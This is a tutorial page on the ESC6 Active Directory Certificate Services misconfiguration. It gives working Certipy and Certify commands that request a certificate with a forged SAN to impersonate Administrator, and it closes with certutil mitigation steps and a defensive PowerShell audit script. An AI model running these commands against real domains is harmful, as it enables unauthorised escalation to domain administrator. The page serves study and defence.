ESC6
Description
ESC6 occurs when a Certificate Authority (CA) has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled in its configuration. This flag allows certificate requesters to specify arbitrary Subject Alternative Name (SAN) values. If Microsoft's May 2022 security update for CVE-2022-26923 has not been applied, the CA may be vulnerable to privilege escalation.
Under these conditions, any certificate template that supports Client Authentication and is enrollable by low-privileged users becomes a potential attack vector. This makes ESC6 similar in effect to ESC1, as an attacker can request a certificate with a forged SAN, impersonating a privileged user. Even the default "User" template could be exploited in this manner, allowing a standard domain user to escalate to a domain administrator.
Requirements for attack path
All of the following conditions must be met:
The CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set.
The security patch for CVE-2022-26923 has not been applied to the CA.
Access to an account which is permitted to enroll in a template that also supports Client Authentication (the default User template is sufficient in most cases).
Linux
Enumeration
certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.231.141 -vulnerable -stdout

Performing the attack
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.231.141 -ca lab-LAB-DC-CA -template User -upn Administrator@lab.local

Once retrieved, we can follow the remainder of the steps as per ESC1.
Windows
Enumeration
Certify can be used to check the Certificate Authorities for the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.
.\Certify.exe cas

Performing the attack
The steps to perform the attack are almost identical to ESC1, except that we pick the default "User" template (or any other candidate template, if required).
.\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:User /altname:Administrator

After retrieval, we can follow the remainder of the steps within ESC1 to complete the attack.
Mitigations
Remove the EDITF_ATTRIBUTESUBJECTALTNAME2 flag from the Certificate Authority.
Run the following on the Certificate Authority as Domain Administrator.
certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
After doing so, restart the Certificate Services service so the change takes effect.
net stop certsvc & net start certsvc
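As an added example (not part of the original page), the following PowerShell audit, run locally on the CA as an administrator, reads the active policy module's EditFlags value from the registry and reports whether the 0x40000 bit (EDITF_ATTRIBUTESUBJECTALTNAME2) is set. It assumes Microsoft's default policy module registry layout under CertSvc\Configuration; the function names are my own.

```powershell
# Added audit example, not from the original page. Run on the CA host as an
# administrator. Assumes the Microsoft default policy module registry layout.

# certutil -getreg policy\EditFlags reports this bit as
# "EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)"
$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

function Test-CaSanFlag {
    # Pure bit test, so the logic can be exercised against any EditFlags value.
    param([Parameter(Mandatory)][uint32]$EditFlags)
    return (($EditFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) -ne 0)
}

function Get-CaEditFlagsStatus {
    $configRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'
    if (-not (Test-Path $configRoot)) {
        Write-Warning "No AD CS configuration under $configRoot; is this host a CA?"
        return
    }
    # 'Active' under Configuration names the CA instance; the same value under
    # PolicyModules names the policy module whose EditFlags certutil edits.
    $caName       = (Get-ItemProperty -Path $configRoot -Name Active).Active
    $policyRoot   = Join-Path $configRoot "$caName\PolicyModules"
    $activeModule = (Get-ItemProperty -Path $policyRoot -Name Active).Active
    $moduleKey    = Join-Path $policyRoot $activeModule

    # REG_DWORD comes back as Int32; mask to keep high-bit values positive.
    $raw        = (Get-ItemProperty -Path $moduleKey -Name EditFlags).EditFlags
    $editFlags  = [uint32]($raw -band 0xFFFFFFFF)
    $sanFlagSet = Test-CaSanFlag -EditFlags $editFlags

    [pscustomobject]@{
        CA           = $caName
        PolicyModule = $activeModule
        EditFlags    = ('0x{0:X8}' -f $editFlags)
        SanFlagSet   = $sanFlagSet
        Remediation  = $(if ($sanFlagSet) {
            'certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2, then restart CertSvc'
        } else { 'none needed' })
    }
}

Get-CaEditFlagsStatus | Format-List
```

A SanFlagSet value of True means any enrollee of a Client Authentication template can supply an arbitrary SAN, which is the condition the Description above depends on.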